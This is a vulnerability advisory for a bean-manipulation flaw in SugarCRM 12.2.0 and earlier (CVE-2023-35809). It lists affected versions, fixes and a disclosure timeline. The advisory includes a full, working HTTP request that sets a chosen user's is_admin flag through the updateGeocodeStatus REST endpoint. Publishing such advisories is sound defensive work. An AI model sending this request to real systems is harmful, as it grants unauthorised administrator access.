SugarCRM 12.2.0 Bean Manipulation

`------------------------------------------------------------------------  
SugarCRM <= 12.2.0 (updateGeocodeStatus) Bean Manipulation Vulnerability  
------------------------------------------------------------------------  
  
  
[-] Software Link:  
  
https://www.sugarcrm.com  
  
  
[-] Affected Versions:  
  
Version 12.2.0 and prior versions.  
Version 12.0.2 and prior versions.  
Version 11.0.5 and prior versions.  
  
  
[-] Vulnerability Description:  
  
The vulnerability is exploitable through the "/maps/updateGeocodeStatus"   
REST API  
endpoint. This might allow a malicious user to modify arbitrary Sugar   
Beans, and that  
could lead to a variety of security impacts, such as Privilege   
Escalation attacks by  
sending an HTTP request like the following:  
  
POST /rest/v11_17/maps/updateGeocodeStatus HTTP/1.1  
Host: sugarcrm_website  
Content-Type: application/json  
OAuth-Token: d4cd573b-3b24-44ae-8eab-6d3b525f7974  
Content-Length: 96  
Connection: close  
  
{"id":"[USER_ID]","module":"Users","fieldName":"is_admin","status":1}  
  
  
[-] Solution:  
  
Upgrade to version 12.3.0, 12.0.3, 11.0.6, or later.  
  
  
[-] Disclosure Timeline:  
  
[14/02/2023] - Vendor notified  
[12/04/2023] - Fixed versions released  
[17/06/2023] - CVE number assigned  
[23/08/2023] - Publication of this advisory  
  
  
[-] CVE Reference:  
  
The Common Vulnerabilities and Exposures project (cve.mitre.org)  
has assigned the name CVE-2023-35809 to this vulnerability.  
  
  
[-] Credits:  
  
Vulnerability discovered by Egidio Romano.  
  
  
[-] Original Advisory:  
  
http://karmainsecurity.com/KIS-2023-06  
  
  
[-] Other References:  
  
https://support.sugarcrm.com/Resources/Security/sugarcrm-sa-2023-007/  
  
`